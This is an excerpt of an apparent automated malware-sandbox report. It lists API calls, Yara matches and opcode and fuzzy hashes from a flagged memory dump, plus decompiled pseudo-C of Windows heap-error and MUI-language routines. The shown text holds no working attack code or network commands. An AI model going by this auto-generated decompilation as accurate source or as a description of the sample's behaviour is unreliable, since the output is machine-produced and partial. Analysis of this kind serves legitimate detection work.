                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitFreeHeapProcess
                                                          • String ID:
                                                          • API String ID: 1180424539-0
                                                          • Opcode ID: d1ad1b48ff400cad936a8fa1b24246ffadf7407577f795f7373464af96314243
                                                          • Instruction ID: c4511ac2febc6498e73959e6e99c70c1d6876e113baf4737b6afcda2f7d1180c
                                                          • Opcode Fuzzy Hash: d1ad1b48ff400cad936a8fa1b24246ffadf7407577f795f7373464af96314243
                                                          • Instruction Fuzzy Hash: A6F03AB5610204ABD710EF58CC81EE777A8EF88714F048159F95857642C630EE10CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                          • Instruction ID: ba3d5bcfed237746ec30380b6ed14dc4a9f69b7da918f5ae44e724b0e7605d49
                                                          • Opcode Fuzzy Hash: c0b1965486bbed21c20c63ece949b1f46c1b03fe5ed161d661499a1b38bcdbd6
                                                          • Instruction Fuzzy Hash: 9C01A771A8032876E721B6959C03FFF776C5B00B55F04011AFF04BA2C2E6A8790687FA
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: b46b039edea0e6df02f5fabe01e86e39dc836000839f91e8b3942128922ef66e
                                                          • Instruction ID: a9d4b5983dc0d3ebd6777c37fa8767f5a160e2d6f2f65e6a4ca238ebb6f0609b
                                                          • Opcode Fuzzy Hash: b46b039edea0e6df02f5fabe01e86e39dc836000839f91e8b3942128922ef66e
                                                          • Instruction Fuzzy Hash: 75E0E5391442146FDB109BE4D844DE77B9CEF80360B048A8BF94DCB612C638E96586A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 545fbf9e85fddac1dc7715abe091de93e58424b159cbb5fb615314e897c30e52
                                                          • Instruction ID: 694a41ca4dfed1ec63eb4ea79a40f4a607dd12edf88ba0853c1f7f99a7bd0a3f
                                                          • Opcode Fuzzy Hash: 545fbf9e85fddac1dc7715abe091de93e58424b159cbb5fb615314e897c30e52
                                                          • Instruction Fuzzy Hash: 10F0A0B5610204BFDB14DF54DC41EEB77A8EF84790F10816AF90D97241CA3598818FF4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: aeb42c0841978cc6acfb1a300decbce5bd9388916bf711b55460998a8c578ca7
                                                          • Instruction ID: ff2353ab4e8ac35d93834b11d80824c0e923b33fc47ea20c8645bc57e75242c5
                                                          • Opcode Fuzzy Hash: aeb42c0841978cc6acfb1a300decbce5bd9388916bf711b55460998a8c578ca7
                                                          • Instruction Fuzzy Hash: 51E01AB1200604BFDB24DF69CC8AEEB7769EF88350F118659FD09A7352C631E915CAA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                          • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                          • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LookupPrivilegeValue
                                                          • String ID:
                                                          • API String ID: 3899507212-0
                                                          • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                          • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                          • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.314660733.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess
                                                          • String ID:
                                                          • API String ID: 621844428-0
                                                          • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
                                                          • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                          • Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 238c062a9c01c46bf21b1b6adff751b25c3bf8e46bb6e2d85196a422652fc815
                                                          • Instruction ID: dede3da8d8a84dffb8c40c52cc24b8d6d3e285f2b6b5d455bb821104c0c54926
                                                          • Opcode Fuzzy Hash: 238c062a9c01c46bf21b1b6adff751b25c3bf8e46bb6e2d85196a422652fc815
                                                          • Instruction Fuzzy Hash: 85B09B71D014C5C5DA56D7E557087177A407BD4745F16C055E2420685B87B8C091F5B5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          Strings
                                                          • The instruction at %p referenced memory at %p., xrefs: 0116B432
                                                          • read from, xrefs: 0116B4AD, 0116B4B2
                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0116B323
                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0116B3D6
                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0116B305
                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0116B53F
                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0116B314
                                                          • write to, xrefs: 0116B4A6
                                                          • a NULL pointer, xrefs: 0116B4E0
                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0116B39B
                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0116B47D
                                                          • *** enter .cxr %p for the context, xrefs: 0116B50D
                                                          • The critical section is owned by thread %p., xrefs: 0116B3B9
                                                          • This failed because of error %Ix., xrefs: 0116B446
                                                          • *** then kb to get the faulting stack, xrefs: 0116B51C
                                                          • The instruction at %p tried to %s , xrefs: 0116B4B6
                                                          • an invalid address, %p, xrefs: 0116B4CF
                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 0116B352
                                                          • The resource is owned exclusively by thread %p, xrefs: 0116B374
                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 0116B48F
                                                          • <unknown>, xrefs: 0116B27E, 0116B2D1, 0116B350, 0116B399, 0116B417, 0116B48E
                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0116B2F3
                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0116B476
                                                          • *** Inpage error in %ws:%s, xrefs: 0116B418
                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0116B484
                                                          • Go determine why that thread has not released the critical section., xrefs: 0116B3C5
                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0116B2DC
                                                          • The resource is owned shared by %d threads, xrefs: 0116B37E
                                                          • *** enter .exr %p for the exception record, xrefs: 0116B4F1
                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0116B38F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                          • API String ID: 0-108210295
                                                          • Opcode ID: db93ac31f77e2dd09008d53b1ba92578ad6bfd58eefe517a1b1d5c93301cb9bf
                                                          • Instruction ID: 9fa9afd322e9e80fd9be109e49adcf362aeab08a2cb36010f75355080cde0e40
                                                          • Opcode Fuzzy Hash: db93ac31f77e2dd09008d53b1ba92578ad6bfd58eefe517a1b1d5c93301cb9bf
                                                          • Instruction Fuzzy Hash: E1812731B48210FFDB2DAB8ACC45DBB3B2AEF56B96F810058F5059F112D3628461C7B6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 44%
                                                          			E01171C06() {
                                                          				signed int _t27;
                                                          				char* _t104;
                                                          				char* _t105;
                                                          				intOrPtr _t113;
                                                          				intOrPtr _t115;
                                                          				intOrPtr _t117;
                                                          				intOrPtr _t119;
                                                          				intOrPtr _t120;
                                                          
                                                          				_t105 = 0x10948a4;
                                                          				_t104 = "HEAP: ";
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          					_push(_t104);
                                                          					E010BB150();
                                                          				} else {
                                                          					E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          				}
                                                          				_push( *0x11a589c);
                                                          				E010BB150("Heap error detected at %p (heap handle %p)\n",  *0x11a58a0);
                                                          				_t27 =  *0x11a5898; // 0x0
                                                          				if(_t27 <= 0xf) {
                                                          					switch( *((intOrPtr*)(_t27 * 4 +  &M01171E96))) {
                                                          						case 0:
                                                          							_t105 = "heap_failure_internal";
                                                          							goto L21;
                                                          						case 1:
                                                          							goto L21;
                                                          						case 2:
                                                          							goto L21;
                                                          						case 3:
                                                          							goto L21;
                                                          						case 4:
                                                          							goto L21;
                                                          						case 5:
                                                          							goto L21;
                                                          						case 6:
                                                          							goto L21;
                                                          						case 7:
                                                          							goto L21;
                                                          						case 8:
                                                          							goto L21;
                                                          						case 9:
                                                          							goto L21;
                                                          						case 0xa:
                                                          							goto L21;
                                                          						case 0xb:
                                                          							goto L21;
                                                          						case 0xc:
                                                          							goto L21;
                                                          						case 0xd:
                                                          							goto L21;
                                                          						case 0xe:
                                                          							goto L21;
                                                          						case 0xf:
                                                          							goto L21;
                                                          					}
                                                          				}
                                                          				L21:
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          					_push(_t104);
                                                          					E010BB150();
                                                          				} else {
                                                          					E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          				}
                                                          				_push(_t105);
                                                          				E010BB150("Error code: %d - %s\n",  *0x11a5898);
                                                          				_t113 =  *0x11a58a4; // 0x0
                                                          				if(_t113 != 0) {
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E010BB150();
                                                          					} else {
                                                          						E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					E010BB150("Parameter1: %p\n",  *0x11a58a4);
                                                          				}
                                                          				_t115 =  *0x11a58a8; // 0x0
                                                          				if(_t115 != 0) {
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E010BB150();
                                                          					} else {
                                                          						E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					E010BB150("Parameter2: %p\n",  *0x11a58a8);
                                                          				}
                                                          				_t117 =  *0x11a58ac; // 0x0
                                                          				if(_t117 != 0) {
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E010BB150();
                                                          					} else {
                                                          						E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					E010BB150("Parameter3: %p\n",  *0x11a58ac);
                                                          				}
                                                          				_t119 =  *0x11a58b0; // 0x0
                                                          				if(_t119 != 0) {
                                                          					L41:
                                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          						_push(_t104);
                                                          						E010BB150();
                                                          					} else {
                                                          						E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          					}
                                                          					_push( *0x11a58b4);
                                                          					E010BB150("Last known valid blocks: before - %p, after - %p\n",  *0x11a58b0);
                                                          				} else {
                                                          					_t120 =  *0x11a58b4; // 0x0
                                                          					if(_t120 != 0) {
                                                          						goto L41;
                                                          					}
                                                          				}
                                                          				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                          					_push(_t104);
                                                          					E010BB150();
                                                          				} else {
                                                          					E010BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                          				}
                                                          				return E010BB150("Stack trace available at %p\n", 0x11a58c0);
                                                          			}











                                                          0x01171c10
                                                          0x01171c16
                                                          0x01171c1e
                                                          0x01171c3d
                                                          0x01171c3e
                                                          0x01171c20
                                                          0x01171c35
                                                          0x01171c3a
                                                          0x01171c44
                                                          0x01171c55
                                                          0x01171c5a
                                                          0x01171c65
                                                          0x01171c67
                                                          0x00000000
                                                          0x01171c6e
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01171c67
                                                          0x01171cdc
                                                          0x01171ce5
                                                          0x01171d04
                                                          0x01171d05
                                                          0x01171ce7
                                                          0x01171cfc
                                                          0x01171d01
                                                          0x01171d0b
                                                          0x01171d17
                                                          0x01171d1f
                                                          0x01171d25
                                                          0x01171d30
                                                          0x01171d4f
                                                          0x01171d50
                                                          0x01171d32
                                                          0x01171d47
                                                          0x01171d4c
                                                          0x01171d61
                                                          0x01171d67
                                                          0x01171d68
                                                          0x01171d6e
                                                          0x01171d79
                                                          0x01171d98
                                                          0x01171d99
                                                          0x01171d7b
                                                          0x01171d90
                                                          0x01171d95
                                                          0x01171daa
                                                          0x01171db0
                                                          0x01171db1
                                                          0x01171db7
                                                          0x01171dc2
                                                          0x01171de1
                                                          0x01171de2
                                                          0x01171dc4
                                                          0x01171dd9
                                                          0x01171dde
                                                          0x01171df3
                                                          0x01171df9
                                                          0x01171dfa
                                                          0x01171e00
                                                          0x01171e0a
                                                          0x01171e13
                                                          0x01171e32
                                                          0x01171e33
                                                          0x01171e15
                                                          0x01171e2a
                                                          0x01171e2f
                                                          0x01171e39
                                                          0x01171e4a
                                                          0x01171e02
                                                          0x01171e02
                                                          0x01171e08
                                                          0x00000000
                                                          0x00000000
                                                          0x01171e08
                                                          0x01171e5b
                                                          0x01171e7a
                                                          0x01171e7b
                                                          0x01171e5d
                                                          0x01171e72
                                                          0x01171e77
                                                          0x01171e95

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.315139597.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                          • API String ID: 0-2897834094
                                                          • Opcode ID: afd663469d0ddbaae865c273275ce5d4b8eb5dacd9e3687b4c4cc6783ee86bf0
                                                          • Instruction ID: 77767ab52b75f3e53c590baa358a13f09f4292d1bd9eb5528b1371dd471879ac
                                                          • Opcode Fuzzy Hash: afd663469d0ddbaae865c273275ce5d4b8eb5dacd9e3687b4c4cc6783ee86bf0
                                                          • Instruction Fuzzy Hash: 09610332524141EFD72DABCAD488E6477B9EB14970BCA843EF9895F301DB349C808F4A
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 96%
                                                          			E010C3D34(signed int* __ecx) {
                                                          				signed int* _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				signed int* _v20;
                                                          				char _v24;
                                                          				signed int _v28;
                                                          				signed int _v32;
                                                          				char _v36;
                                                          				signed int _v40;
                                                          				signed int _v44;
                                                          				signed int* _v48;
                                                          				signed int* _v52;
                                                          				signed int _v56;
                                                          				signed int _v60;
                                                          				char _v68;
                                                          				signed int _t140;
                                                          				signed int _t161;
                                                          				signed int* _t236;
                                                          				signed int* _t242;
                                                          				signed int* _t243;
                                                          				signed int* _t244;
                                                          				signed int* _t245;
                                                          				signed int _t255;
                                                          				void* _t257;
                                                          				signed int _t260;
                                                          				void* _t262;
                                                          				signed int _t264;
                                                          				void* _t267;
                                                          				signed int _t275;
                                                          				signed int* _t276;
                                                          				short* _t277;
                                                          				signed int* _t278;
                                                          				signed int* _t279;
                                                          				signed int* _t280;
                                                          				short* _t281;
                                                          				signed int* _t282;
                                                          				short* _t283;
                                                          				signed int* _t284;
                                                          				void* _t285;
                                                          
                                                          				_v60 = _v60 | 0xffffffff;
                                                          				_t280 = 0;
                                                          				_t242 = __ecx;
                                                          				_v52 = __ecx;
                                                          				_v8 = 0;
                                                          				_v20 = 0;
                                                          				_v40 = 0;
                                                          				_v28 = 0;
                                                          				_v32 = 0;
                                                          				_v44 = 0;
                                                          				_v56 = 0;
                                                          				_t275 = 0;
                                                          				_v16 = 0;
                                                          				if(__ecx == 0) {
                                                          					_t280 = 0xc000000d;
                                                          					_t140 = 0;
                                                          					L50:
                                                          					 *_t242 =  *_t242 | 0x00000800;
                                                          					_t242[0x13] = _t140;
                                                          					_t242[0x16] = _v40;
                                                          					_t242[0x18] = _v28;
                                                          					_t242[0x14] = _v32;
                                                          					_t242[0x17] = _t275;
                                                          					_t242[0x15] = _v44;
                                                          					_t242[0x11] = _v56;
                                                          					_t242[0x12] = _v60;
                                                          					return _t280;
                                                          				}
                                                          				if(E010C1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                          					_v56 = 1;
                                                          					if(_v8 != 0) {
                                                          						L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                          					}
                                                          					_v8 = _t280;
                                                          				}
                                                          				if(E010C1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                          					_v60 =  *_v8;
                                                          					L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                          					_v8 = _t280;
                                                          				}
                                                          				if(E010C1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                          					L16:
                                                          					if(E010C1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                          						L28:
                                                          						if(E010C1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                          							L46:
                                                          							_t275 = _v16;
                                                          							L47:
                                                          							_t161 = 0;
                                                          							L48:
                                                          							if(_v8 != 0) {
                                                          								L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                          							}
                                                          							_t140 = _v20;
                                                          							if(_t140 != 0) {
                                                          								if(_t275 != 0) {
                                                          									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                          									_t275 = 0;
                                                          									_v28 = 0;
                                                          									_t140 = _v20;
                                                          								}
                                                          							}
                                                          							goto L50;
                                                          						}
                                                          						_t167 = _v12;
                                                          						_t255 = _v12 + 4;
                                                          						_v44 = _t255;
                                                          						if(_t255 == 0) {
                                                          							_t276 = _t280;
                                                          							_v32 = _t280;
                                                          						} else {
                                                          							_t276 = L010D4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                          							_t167 = _v12;
                                                          							_v32 = _t276;
                                                          						}
                                                          						if(_t276 == 0) {
                                                          							_v44 = _t280;
                                                          							_t280 = 0xc0000017;
                                                          							goto L46;
                                                          						} else {
                                                          							E010FF3E0(_t276, _v8, _t167);
                                                          							_v48 = _t276;
                                                          							_t277 = E01101370(_t276, 0x1094e90);
                                                          							_pop(_t257);
                                                          							if(_t277 == 0) {
                                                          								L38:
                                                          								_t170 = _v48;
                                                          								if( *_v48 != 0) {
                                                          									E010FBB40(0,  &_v68, _t170);
                                                          									if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          										_t280 =  &(_t280[0]);
                                                          									}
                                                          								}
                                                          								if(_t280 == 0) {
                                                          									_t280 = 0;
                                                          									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                          									_v44 = 0;
                                                          									_v32 = 0;
                                                          								} else {
                                                          									_t280 = 0;
                                                          								}
                                                          								_t174 = _v8;
                                                          								if(_v8 != 0) {
                                                          									L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                          								}
                                                          								_v8 = _t280;
                                                          								goto L46;
                                                          							}
                                                          							_t243 = _v48;
                                                          							do {
                                                          								 *_t277 = 0;
                                                          								_t278 = _t277 + 2;
                                                          								E010FBB40(_t257,  &_v68, _t243);
                                                          								if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          									_t280 =  &(_t280[0]);
                                                          								}
                                                          								_t243 = _t278;
                                                          								_t277 = E01101370(_t278, 0x1094e90);
                                                          								_pop(_t257);
                                                          							} while (_t277 != 0);
                                                          							_v48 = _t243;
                                                          							_t242 = _v52;
                                                          							goto L38;
                                                          						}
                                                          					}
                                                          					_t191 = _v12;
                                                          					_t260 = _v12 + 4;
                                                          					_v28 = _t260;
                                                          					if(_t260 == 0) {
                                                          						_t275 = _t280;
                                                          						_v16 = _t280;
                                                          					} else {
                                                          						_t275 = L010D4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                          						_t191 = _v12;
                                                          						_v16 = _t275;
                                                          					}
                                                          					if(_t275 == 0) {
                                                          						_v28 = _t280;
                                                          						_t280 = 0xc0000017;
                                                          						goto L47;
                                                          					} else {
                                                          						E010FF3E0(_t275, _v8, _t191);
                                                          						_t285 = _t285 + 0xc;
                                                          						_v48 = _t275;
                                                          						_t279 = _t280;
                                                          						_t281 = E01101370(_v16, 0x1094e90);
                                                          						_pop(_t262);
                                                          						if(_t281 != 0) {
                                                          							_t244 = _v48;
                                                          							do {
                                                          								 *_t281 = 0;
                                                          								_t282 = _t281 + 2;
                                                          								E010FBB40(_t262,  &_v68, _t244);
                                                          								if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          									_t279 =  &(_t279[0]);
                                                          								}
                                                          								_t244 = _t282;
                                                          								_t281 = E01101370(_t282, 0x1094e90);
                                                          								_pop(_t262);
                                                          							} while (_t281 != 0);
                                                          							_v48 = _t244;
                                                          							_t242 = _v52;
                                                          						}
                                                          						_t201 = _v48;
                                                          						_t280 = 0;
                                                          						if( *_v48 != 0) {
                                                          							E010FBB40(_t262,  &_v68, _t201);
                                                          							if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          								_t279 =  &(_t279[0]);
                                                          							}
                                                          						}
                                                          						if(_t279 == 0) {
                                                          							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                          							_v28 = _t280;
                                                          							_v16 = _t280;
                                                          						}
                                                          						_t202 = _v8;
                                                          						if(_v8 != 0) {
                                                          							L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                          						}
                                                          						_v8 = _t280;
                                                          						goto L28;
                                                          					}
                                                          				}
                                                          				_t214 = _v12;
                                                          				_t264 = _v12 + 4;
                                                          				_v40 = _t264;
                                                          				if(_t264 == 0) {
                                                          					_v20 = _t280;
                                                          				} else {
                                                          					_t236 = L010D4620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                          					_t280 = _t236;
                                                          					_v20 = _t236;
                                                          					_t214 = _v12;
                                                          				}
                                                          				if(_t280 == 0) {
                                                          					_t161 = 0;
                                                          					_t280 = 0xc0000017;
                                                          					_v40 = 0;
                                                          					goto L48;
                                                          				} else {
                                                          					E010FF3E0(_t280, _v8, _t214);
                                                          					_t285 = _t285 + 0xc;
                                                          					_v48 = _t280;
                                                          					_t283 = E01101370(_t280, 0x1094e90);
                                                          					_pop(_t267);
                                                          					if(_t283 != 0) {
                                                          						_t245 = _v48;
                                                          						do {
                                                          							 *_t283 = 0;
                                                          							_t284 = _t283 + 2;
                                                          							E010FBB40(_t267,  &_v68, _t245);
                                                          							if(L010C43C0( &_v68,  &_v24) != 0) {
                                                          								_t275 = _t275 + 1;
                                                          							}
                                                          							_t245 = _t284;
                                                          							_t283 = E01101370(_t284, 0x1094e90);
                                                          							_pop(_t267);
                                                          						} while (_t283 != 0);
